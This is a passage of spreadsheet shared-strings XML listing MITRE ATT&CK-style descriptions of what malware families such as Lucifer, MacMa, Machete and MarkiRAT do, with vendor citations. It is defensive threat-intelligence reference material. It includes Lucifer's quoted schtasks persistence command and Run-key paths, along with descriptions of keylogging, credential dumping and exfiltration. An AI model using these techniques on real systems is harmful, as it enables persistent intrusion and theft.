    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a batch script to run the Linux virtual machine as a service.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) can dump active logon session password hashes from the lsass process.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can clear and remove event logs.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can decrypt its C2 address upon execution.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can download and execute a replica of itself using [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use [certutil](https://attack.mitre.org/software/S0160) for propagation on Windows hosts within intranets.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can execute TCP, UDP,  and HTTP denial of service (DoS) attacks.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can scan for open ports including TCP ports 135 and 1433.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and    passwords.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the process that owns remote connections.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for existing stratum cryptomining information in &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can persist by setting Registry key values &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can infect victims by brute forcing SMB.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has established persistence by creating the following scheduled task &lt;code&gt;schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has used UPX packed binaries.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the computer name, system architecture, default language, and processor frequency of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the IP address of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the IP and port numbers for all remote connections from the compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has the ability to identify the username on a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can issue shell commands to download and execute additional payloads.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use WMI to log into remote machines for propagation.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) can compress data before sending it.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) performs XOR encryption.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to remove set Registry Keys, including those used for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to upload files from an infected device.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can modify processes to prevent them from being visible on the desktop.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can upload additional files to a compromised host.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has been named Readme.txt to appear legitimate.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can Base64 encode output strings prior to sending to C2.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use Registry Run Keys for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use scheduled tasks for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can launch a console process (cmd.exe) with redirected standard input and output.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.  (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to schedule remote AT jobs.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to delete local files.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about users on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to scan for open ports on hosts in a connected network.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about shares on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about groups.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to identify remote hosts on connected networks.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about the OS.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) uses the command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has the ability to record audio.(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can clear possible malware traces such as application logs.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect then exfiltrate files from the compromised system.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) decrypts a downloaded file using AES-128-EBC with a custom delta.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used TLS encryption to initialize a custom protocol for C2 communications.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) exfiltrates data from a supplied path over its C2 channel.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can delete itself from the compromised computer.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has removed the `com.apple.quarantineattribute` from the dropped file, `$TMPDIR/airportpaird`.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has downloaded additional files, including an exploit for used privilege escalation.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can dump credentials from the macOS keychain.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.(Citation: Objective-See MacMa Nov 2021)(Citation: SentinelOne MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, [MacMa](https://attack.mitre.org/software/S1016) is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the [MacMa](https://attack.mitre.org/software/S1016) only runs when there is a logged in GUI user.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has stored collected files locally before exfiltration.(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used macOS API functions to perform tasks.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used a custom JSON-based protocol for its C&amp;C communications.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used TCP port 5633 for C2 Communication.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can enumerate running processes.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can manage remote screen sessions.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect IP addresses from a compromised host.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect the username from the compromised machine.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has the capability to create and modify file timestamps.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can execute supplied shell commands and uses bash scripts to perform additional actions.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can record the sounds from microphones on a computer.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can steal clipboard contents.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) deletes any temporary files it creates(Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) stores itself in &lt;code&gt;~/Library/.DS_Stores/&lt;/code&gt; (Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) captures keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses Tor for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can capture screenshots of the desktop over multiple monitors.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses HTTP for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) saves the window names.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) stores zipped files with profile data from installed web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)'s collected data is encrypted with AES before exfiltration.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used TLS-encrypted FTP to exfiltrate data.(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures audio from the computer’s microphone.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)’s collected files are exfiltrated automatically to remote servers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) hijacks the clipboard data by creating an overlapped window that listens to keyboard events.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects stored credentials from several web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) searches the File system for files of interest.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) can find, encrypt, and upload files from fixed and removable drives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)’s downloaded data is decrypted using AES.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)'s collected data is exfiltrated over the same channel used for C2.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has a feature to copy files from every drive onto a removable drive in a hidden folder.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has sent data over HTTP if FTP failed, and has also used a fallback server.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">Once a file is uploaded, [Machete](https://attack.mitre.org/software/S0409) will delete it from the machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses FTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) produces file listings in order to search for files to be exfiltrated.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has the capability to exfiltrate stolen data to a hidden folder on a removable drive.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Machete](https://attack.mitre.org/software/S0409) can download additional files for execution on the victim’s machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) logs keystrokes from the victim’s machine.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) stores files and logs in a folder on the local drive.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. [Machete](https://attack.mitre.org/groups/G0095) has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.(Citation: ESET Machete July 2019)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has scanned and looked for cryptographic keys and certificate file extensions.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has a component to check for running processes to look for web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is written in Python and is used in conjunction with additional Python scripts.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) used the startup folder for persistence.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>The different components of [Machete](https://attack.mitre.org/software/S0409) are executed by Windows Task Scheduler.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) sends stolen data to the C2 server every 10 minutes.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures screenshots.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has been packed with NSIS.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used base64 encoding.(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used AES to exfiltrate documents.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects the hostname of the target computer.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) collects the MAC address of the target computer and other network configuration information.(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) uses the &lt;code&gt;netsh wlan show networks mode=bssid&lt;/code&gt; and &lt;code&gt;netsh wlan show interfaces&lt;/code&gt; commands to list all nearby WiFi networks and connected interfaces.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) takes photos from the computer’s web camera.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses HTTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used to obtain account names from Exchange and Office 365 using the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; cmdlet.(Citation: Black Hills Attacking Exchange MailSniper, 2016)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for password spraying against Exchange and Office 365.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for searching through email in Exchange and Office 365 environments.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can use BITS Utility to connect with the C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can capture clipboard content.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can upload data from the victim's machine to the C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can exfiltrate locally stored data via its C2.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can download additional files and tools from its C2 server, including through the use of [BITSAdmin](https://attack.mitre.org/software/S0190).(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can capture all keystrokes on a compromised host.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can store collected data locally in a created .nfo file.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can masquerade as &lt;code&gt;update.exe&lt;/code&gt; and &lt;code&gt;svehost.exe&lt;/code&gt;; it has also mimicked legitimate Telegram and Chrome files.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can run the ShellExecuteW API via the Windows Command Shell.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[MarkiRAT](https://attack.mitre.org/software/S0652) can gather information from the Keepass password manager.(Citation: Kaspersky Ferocious Kitten Jun 2021) </t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can search for different processes on a system.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can capture screenshots that are initially saved as ‘scr.jpg’.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can check for the Telegram installation directory by enumerating the files on disk.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can obtain the computer name from a compromised host.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can use the &lt;code&gt;GetKeyboardLayout&lt;/code&gt; API to check if a compromised host's keyboard is set to Persian.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can retrieve the victim’s username.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can initiate communication over HTTP/HTTPS for its C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can utilize cmd.exe to execute commands in a victim's environment.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of providing Meterpreter shell access.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
